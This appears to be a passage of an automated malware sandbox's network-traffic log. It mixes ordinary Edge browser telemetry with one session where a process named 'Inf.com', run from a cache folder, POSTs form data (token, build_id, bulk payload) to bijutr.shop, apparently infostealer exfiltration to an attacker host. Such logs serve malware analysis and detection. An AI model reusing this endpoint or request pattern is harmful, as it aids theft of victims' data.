                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:36 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:36 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:36 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:36 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:36 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:36 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:36 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:38 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:01:38 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  28192.168.2.54993718.165.220.574432372C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:36 UTC925OUTGET /b?rn=1735279295840&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=3918B198F66063F3328CA4FAF7676296&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:37 UTC955INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:01:37 GMT
                                                                                                                                                                                                                                                                                                  Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                                                  Location: /b2?rn=1735279295840&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=3918B198F66063F3328CA4FAF7676296&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null
                                                                                                                                                                                                                                                                                                  set-cookie: UID=1AE10fc6589f9ad55d15d371735279297; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                                                  set-cookie: XID=1AE10fc6589f9ad55d15d371735279297; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                                                  X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                                  Via: 1.1 358b28eebad5be133b48dbeaa3a5bbdc.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                  X-Amz-Cf-Pop: BAH53-P1
                                                                                                                                                                                                                                                                                                  X-Amz-Cf-Id: M4eC_RrmNxvkxSTtnjQeBrZZylswBgZ7CLtaSbfzG-msmwhr3lOFPg==


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  29192.168.2.54998213.89.178.274432372C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:38 UTC1082OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735279295838&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  Content-Length: 3869
                                                                                                                                                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                  Cookie: _C_ETH=1; USRLOC=; MUID=3918B198F66063F3328CA4FAF7676296; _EDGE_S=F=1&SID=1DDB83DF79F56C08037C96BD787D6D0A; _EDGE_V=1
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:38 UTC3869OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 50 61 67 65 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 37 54 30 36 3a 30 31 3a 33 35 2e 38 33 34 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 31 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 30 62 33 31 66 37 35 39 2d 61 66 38 39 2d 34 65 35 65 2d 61 62 65 39 2d 36 66 65 66 61 38 64 39 38 65 64 34 22 2c 22 65 70 6f 63 68 22 3a 22 31 38 33 30 38 30 35 39 37 38 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                                                                                                                                                  Data Ascii: {"name":"MS.News.Web.PageView","time":"2024-12-27T06:01:35.834Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":1,"installId":"0b31f759-af89-4e5e-abe9-6fefa8d98ed4","epoch":"1830805978"},"app":{"locale
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:39 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                  Set-Cookie: MC1=GUID=22def9b2d89c4c3ba58c65ddc50c5df1&HASH=22de&LV=202412&V=4&LU=1735279299043; Domain=.microsoft.com; Expires=Sat, 27 Dec 2025 06:01:39 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                  Set-Cookie: MS0=91caadf1416c474c9f4525975e142cf3; Domain=.microsoft.com; Expires=Fri, 27 Dec 2024 06:31:39 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                  time-delta-millis: 3205
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:01:38 GMT
                                                                                                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  30192.168.2.54999518.164.116.984432372C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:39 UTC1012OUTGET /b2?rn=1735279295840&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=3918B198F66063F3328CA4FAF7676296&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                  Cookie: UID=1AE10fc6589f9ad55d15d371735279297; XID=1AE10fc6589f9ad55d15d371735279297
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:39 UTC326INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:01:39 GMT
                                                                                                                                                                                                                                                                                                  Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                                                  X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                                  Via: 1.1 a0be26685e47d6d6220ccd40bc5f0a4e.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                  X-Amz-Cf-Pop: JFK50-P6
                                                                                                                                                                                                                                                                                                  X-Amz-Cf-Id: EKy5t_C6O0MPG5cwXIG_dp30bIdt1seuNoTvIjvC3nvnKVPQ2-TZMw==


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  31192.168.2.549997188.245.216.2054431276C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:39 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----47QIWB1DJMYU3EKFUAA1
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: bijutr.shop
                                                                                                                                                                                                                                                                                                  Content-Length: 131557
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:39 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 34 37 51 49 57 42 31 44 4a 4d 59 55 33 45 4b 46 55 41 41 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 64 32 36 63 35 34 32 31 38 37 62 31 62 64 38 66 66 61 32 38 31 32 30 66 30 62 33 62 38 61 0d 0a 2d 2d 2d 2d 2d 2d 34 37 51 49 57 42 31 44 4a 4d 59 55 33 45 4b 46 55 41 41 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 38 36 30 35 36 39 34 34 35 32 30 37 66 31 31 39 38 66 33 31 32 37 61 32 65 30 64 34 61 32 39 0d 0a 2d 2d 2d 2d 2d 2d 34 37 51 49 57 42 31 44 4a 4d 59 55 33 45 4b 46 55 41 41 31 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                  Data Ascii: ------47QIWB1DJMYU3EKFUAA1Content-Disposition: form-data; name="token"a9d26c542187b1bd8ffa28120f0b3b8a------47QIWB1DJMYU3EKFUAA1Content-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------47QIWB1DJMYU3EKFUAA1Cont
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
